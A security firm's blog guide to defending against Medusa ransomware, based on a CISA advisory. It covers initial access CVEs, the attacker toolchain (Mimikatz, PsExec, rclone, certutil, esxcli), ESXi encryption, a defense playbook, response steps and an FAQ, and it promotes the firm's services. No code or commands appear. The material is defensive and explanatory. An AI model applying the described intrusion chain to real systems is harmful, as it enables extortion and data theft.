Medusa Ransomware Defense Guide (2026 Update)

Posted: May 16, 2026 to Cybersecurity.

This guide translates the CISA AA25-071A advisory into actions an SMB CISO, IT director, or on-call responder can take this week. We focus on Medusa specifically: the affiliates, the initial access vectors, the living-off-the-land toolchain, the encryption phase, and the decision tree if you are already inside the incident. Petronella Technology Group has run incident response, digital forensics, and managed XDR engagements out of Raleigh since 2002, and Craig Petronella (DFE #604180, CMMC-RP) leads the responder bench. We are CMMC-RPO #1449.

Who is Medusa, and why should an SMB care?

Medusa is a Ransomware-as-a-Service operation. A small core team maintains the encryptor, the negotiation chat, and the Medusa Blog leak site. Affiliates carry out the intrusions and split the ransom proceeds. The model lowers the bar for entry, which is why Medusa victim counts climbed sharply through 2024 and into 2025.

The victim profile is not Fortune 100. CISA AA25-071A names healthcare, education, manufacturing, legal, insurance, and technology as primary sectors. Local school districts, regional hospitals, mid-market manufacturers, and law firms have all surfaced on the Medusa Blog. If your organization runs internet-facing remote access, sits in one of those sectors, and lags patches by more than a few weeks, you are inside Medusa's target band.

Double extortion means two coercion levers running at once. Files on disk are encrypted with the .medusa extension, and a copy of sensitive data is exfiltrated to attacker infrastructure before the encryptor fires. Victims are given a 48-hour window in the ransom note to begin negotiation through a Tor-based chat or the Tox messenger. Refuse, and stolen data appears on the Medusa Blog. Unit 42 documented Medusa moving toward more aggressive public posting starting in early 2023.

The $10,000-per-day timer extension is unusual. It is designed to apply pressure on internal stakeholders who think they have a week to decide. They do not.

Initial access: how Medusa gets in

According to AA25-071A, Medusa affiliates rely on two consistent entry paths.

Phishing for credentials. Initial access brokers run phishing campaigns to steal valid credentials. Those credentials are then sold or used directly by Medusa affiliates to log in to email, VPN, or RDP. Because the login is "valid," many SMB defenses do not raise an alert until lateral movement begins.

Exploitation of known, unpatched CVEs. AA25-071A and industry analysis identify two named vulnerabilities Medusa actors have leveraged:

• CVE-2024-1709, the ConnectWise ScreenConnect authentication bypass (CVSS 10.0). Any SMB running an unpatched ScreenConnect server, including managed-services providers, has been a target.
• CVE-2023-48788, the Fortinet FortiClient EMS SQL injection (CVSS 9.8). Internet-exposed FortiClient EMS instances that missed the March 2024 patch window are at sustained risk.

Beyond those two named CVEs, the broader directive from AA25-071A is the only durable advice: patch the CVEs called out in CISA advisories the same week they are published, especially anything on the edge of your network. Affiliates do not invent zero-days. They reuse the public CVE feed against organizations that have not.

Living off the land: what Medusa does once inside

Medusa actors operate quietly using legitimate administrative tools, a pattern security teams call "living off the land." The CISA advisory documents the following toolchain:

• Remote access: AnyDesk for persistent access, Remote Desktop Protocol for lateral pivoting, and abuse of ConnectWise ScreenConnect where it is already deployed.
• Reconnaissance: Advanced IP Scanner and SoftPerfect Network Scanner to map internal subnets and identify file shares, domain controllers, and ESXi hosts.
• Credential theft: Mimikatz to dump credentials from LSASS memory on compromised hosts.
• Lateral distribution: PsExec for command execution across hosts, plus PDQ Deploy and BigFix where Medusa affiliates can hijack existing patch-management infrastructure.
• Defense evasion: Disabling endpoint security, deleting PowerShell command history, executing base64-encoded commands, and obfuscating strings by slicing them into variables.
• Exfiltration: rclone to push stolen files to attacker-controlled cloud storage before encryption fires.
• Encryptor delivery: certutil for file transfer; a binary commonly observed as gaze.exe drops the encryptor.

None of these tools are malware by themselves. PsExec, AnyDesk, rclone, and PDQ Deploy are all in legitimate use across thousands of IT shops. That is the point. A signature-based antivirus will not catch the Medusa kill chain. Detection requires behavioral analytics, an EDR with managed review, and someone on call who can correlate "rclone running on a workstation at 2:14 a.m." with "this is wrong." Our managed XDR suite and 24/7 AI-and-human-hybrid SOC are scoped specifically for this detection problem.

Encryption phase: ESXi and Windows variants

Medusa maintains both a Windows encryptor and an ESXi-targeted variant. The Windows variant uses AES-256 encryption, appends the .medusa extension, and drops a ransom note titled !READ_ME_MEDUSA!!.txt. The note routes the victim to a Tor browser-based live chat or to a Tox messenger ID, with a 48-hour clock.

The ESXi variant is the one that destroys SMBs. Affiliates targeting a virtualized environment use stolen credentials to log in to vCenter or the ESXi host directly, then issue esxcli commands to terminate running virtual machines so the .vmdk files can be encrypted while at rest. A single successful ESXi run can take an entire data center offline in under an hour. If your VMware management interfaces are reachable from the user LAN, that is the single highest-risk gap in your environment.

Some intrusions complete the encryption phase in under 24 hours from initial access, which is why phishing-driven incidents often surface as "we got an email yesterday and now everything is encrypted." There is rarely a multi-week dwell time with Medusa affiliates the way there is with some other ransomware crews.

The 7-step Medusa defense playbook

This is the prioritized list for an SMB CISO, IT director, or MSP working a Medusa risk reduction sprint.

1. Patch CVE-2024-1709 and CVE-2023-48788 today, then institutionalize CISA-advisory patching

If you are running ConnectWise ScreenConnect on-prem or FortiClient EMS, confirm patch status this hour, not this week. After that, build a process that triages every CISA advisory within 7 days. Internet-facing systems get same-week patches; internal systems get 30-day cycles with an exception process. Our penetration testing service includes external attack surface scoping that catches exposed management interfaces before Medusa scanners do.

2. Phishing-resistant MFA on every remote access path

Medusa affiliates buy valid credentials from initial access brokers. SMS-based and push-based MFA are repeatedly bypassed by MFA-fatigue campaigns and SIM-swap attacks. Move VPN, RDP gateway, VDI, Microsoft 365, and any SSO to phishing-resistant factors: FIDO2 security keys, Windows Hello for Business, or platform passkeys. Enforce MFA on every account, including service accounts wherever supported.

3. Immutable, offline backups using the 3-2-1-1-0 rule

Three copies, two media types, one offsite, one offline or immutable, zero errors on test restores. The "one immutable" copy is the rule that defeats Medusa. Cloud object lock, tape, or air-gapped media protects the recovery path even if the encryptor reaches the backup server. Test the restore quarterly; an untested backup is a guess. Our backup and disaster recovery service is built around this rule.

4. EDR with managed SOC review, not just installed

Behavioral EDR catches Mimikatz, PsExec lateral movement, rclone exfiltration, and esxcli abuse. But only if someone reviews alerts at 2:14 a.m. SMBs that install EDR without a 24/7 review function frequently miss the early kill chain stages because alerts fire into an empty inbox. A managed SOC, whether in-house or outsourced, is the difference between a noisy log and a contained incident. See managed XDR suite.

5. Email security tuned for credential-harvest phishing

Layer DMARC enforcement, attachment sandboxing, URL rewriting, and user reporting on top of native Microsoft 365 or Google Workspace controls. Pair the technical controls with phishing simulation that rotates pretexts every quarter. The goal is not zero clicks; it is fast user reporting and a tight feedback loop from inbox to SOC.

6. Network segmentation around ESXi management and backups

The ESXi management network and the backup repository should not be reachable from user workstations. Use VLANs, host firewalls, and jump hosts. Require a separate, MFA-protected, just-in-time admin path. This single control would have blunted the encryption-phase blast radius in many published Medusa cases.

7. Tested incident response plan with named roles

A plan that lives in a binder and has never been rehearsed will fail at 3 a.m. Run a tabletop exercise twice a year that walks through a Medusa scenario: phishing email lands Monday, lateral movement Wednesday, ESXi encryption Friday. Identify who calls legal counsel, who calls the cyber-insurance carrier, who decides whether to engage law enforcement, and who has authority to disconnect the WAN. Petronella's incident response services include retainer-based tabletop facilitation.

If you suspect active intrusion right now

Call our 24/7 line: (919) 348-4912. Do this before you reboot anything.

The single most damaging move in the first hour of a suspected Medusa intrusion is rebooting a workstation to "clear it up." Reboots destroy volatile evidence in memory: credentials in LSASS, in-flight network connections, attacker-controlled process trees, and unencrypted shadow copies. Preserve the machine state. Disconnect from the network if you must, but do not power down.

The decision tree we work through with a client in the first 60 minutes:

• Scope: How many hosts show indicators? Is the domain controller compromised? Is ESXi management reachable from the affected segment?
• Contain: Disable inbound RDP and VPN at the firewall. Disable suspect user accounts. Block known Medusa Tor exit nodes if they appear in egress logs.
• Preserve: Take memory captures of impacted hosts. Pull network packet captures at the egress. Image at least one affected endpoint before remediation begins.
• Notify: Engage cyber-insurance counsel before talking to anyone external. Counsel directs the privilege relationship with the forensic firm.
• Assess: Determine whether exfiltration completed. The rclone process logs and the egress traffic volume tell that story.

Our digital forensics team supports the evidence preservation side of this in coordination with counsel and the insurer.

Recovery playbook: do not pay by default

The default answer to "should we pay?" is no. There are three reasons.

First, payment funds the next intrusion. CISA and the FBI consistently recommend against paying ransom because it sustains the RaaS economy.

Second, payment does not guarantee decryption. There are documented Medusa cases where victims paid, received a faulty decryptor, and still had to rebuild from backups. There are also reported instances of double-dipping, where affiliates demanded a second payment after the first.

Third, payment does not stop the leak. Exfiltrated data exists on attacker infrastructure indefinitely. Paying buys a promise to delete it, not proof of deletion.

The default recovery flow:

• Document the incident contemporaneously for the cyber-insurance carrier. Insurers will ask for timestamps, screenshots, log excerpts, and the chain of decisions. Memory fades; the record needs to be created during the event.
• Preserve evidence for law enforcement. Coordinate with the FBI field office and report through IC3 or your CISA regional advisor.
• Restore from the immutable backup tier after confirming the backups themselves are clean.
• Rotate every credential. Every. Domain admin, service accounts, application secrets, API keys, VPN PSKs, cloud IAM keys. Assume Mimikatz captured the lot.
• Rebuild the perimeter. Replace any internet-facing system that was the initial access point; do not patch in place.
• Conduct a post-incident review within 30 days. Update the IR plan with what the tabletop did not anticipate.

How Petronella Technology Group helps

Petronella Technology Group has been doing cybersecurity, incident response, and digital forensics out of Raleigh, North Carolina since 2002. Craig Petronella holds a Digital Forensics Examiner credential (DFE #604180), the CMMC Registered Practitioner designation, and MIT-Certified credentials in AI and Blockchain. The team is collectively CMMC-RP, and we are a CMMC Registered Provider Organization, RPO #1449. BBB A+ since 2003.

Our service stack against Medusa-class threats:

• Managed XDR with 24/7 AI-and-human hybrid SOC review.
• Incident response retainer with named-responder SLAs and tabletop facilitation.
• Immutable backup and disaster recovery that implements 3-2-1-1-0 by default.
• External attack surface and penetration testing to find what Medusa scanners would find.
• Digital forensics for evidence preservation, insurance claim support, and post-incident review.
• Full cybersecurity program coverage including governance, awareness, and CMMC, HIPAA, and NIST 800-171 alignment.

Call (919) 348-4912 for a 24/7 incident response engagement, or for a proactive assessment of your exposure to the CVEs and TTPs documented in CISA AA25-071A.

Frequently asked questions

What is Medusa ransomware?

Medusa is a Ransomware-as-a-Service operation that has been active since June 2021. A core development team maintains the encryptor and the Medusa Blog leak site; independent affiliates carry out the intrusions and share ransom proceeds. CISA, the FBI, and MS-ISAC published joint advisory AA25-071A on March 12, 2025, after Medusa affiliates impacted more than 300 critical infrastructure victims through February 2025.

How does Medusa breach a network?

Two consistent entry paths. First, phishing campaigns run by initial access brokers harvest valid credentials, which are then used to log in to VPN, RDP, or email. Second, exploitation of known unpatched CVEs, with CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2023-48788 in Fortinet FortiClient EMS specifically named in the public reporting. Once inside, affiliates use AnyDesk, PsExec, Mimikatz, and rclone to move laterally and exfiltrate data before encryption.

Should I pay the Medusa ransom?

The default answer is no. The FBI and CISA both recommend against payment. Payment funds the next intrusion, does not guarantee a working decryptor, and does not stop exfiltrated data from appearing on the Medusa Blog. Payment also does not eliminate the legal, regulatory, and notification obligations the breach triggered. Decisions about payment should run through cyber-insurance counsel, not be made by an IT director alone under pressure.

What is the CISA advisory on Medusa?

CISA AA25-071A, titled "#StopRansomware: Medusa Ransomware," was published on March 12, 2025 by CISA, the FBI, and MS-ISAC. It documents Medusa TTPs and indicators of compromise observed through February 2025, lists tools the affiliates use, names key CVEs being exploited, and provides recommended mitigations. The advisory includes a STIX-format IOC bundle for ingestion into SIEM and EDR platforms.

How can I tell if I have been infected?

Indicators include files with the .medusa extension, a ransom note named !READ_ME_MEDUSA!!.txt, unexpected AnyDesk or ConnectWise ScreenConnect installations, rclone or certutil processes running on workstations or servers, PowerShell command history that has been deleted, base64-encoded commands in event logs, and unexpected reboots of ESXi virtual machines. Earlier indicators include phishing emails delivered to staff, unusual successful logins from unfamiliar geographies, and Mimikatz signatures on domain controllers. An EDR with managed review catches most of the early indicators; raw event log review catches the rest.

How quickly can Medusa encrypt a network?

Faster than most SMBs expect. Some published intrusions move from initial access to full encryption in under 24 hours. The ESXi variant is particularly fast because a single affiliate with stolen vCenter credentials can issue esxcli kill commands to shut down every running VM and then encrypt the .vmdk files at rest in minutes. This is why detection at the initial-access stage, not the encryption stage, is the only realistic defense posture.

What sectors does Medusa target?

Healthcare, education, manufacturing, legal, insurance, and technology are explicitly named in CISA AA25-071A. The common thread is mid-market organizations with internet-facing remote access, regulatory-grade data worth extorting, and patch cycles that lag CISA advisories by more than 7 days. Petronella Technology Group works with clients across all six of those sectors and aligns defensive programs to HIPAA, CMMC, ISO 27001, and NIST 800-171 where applicable.

Sources cited: CISA AA25-071A "#StopRansomware: Medusa Ransomware" (March 12, 2025, FBI, CISA, MS-ISAC); Unit 42 by Palo Alto Networks reporting on the Medusa Blog leak site escalation (2023-2025); Picus Security analysis of AA25-071A; Industrial Defender summary of the joint advisory.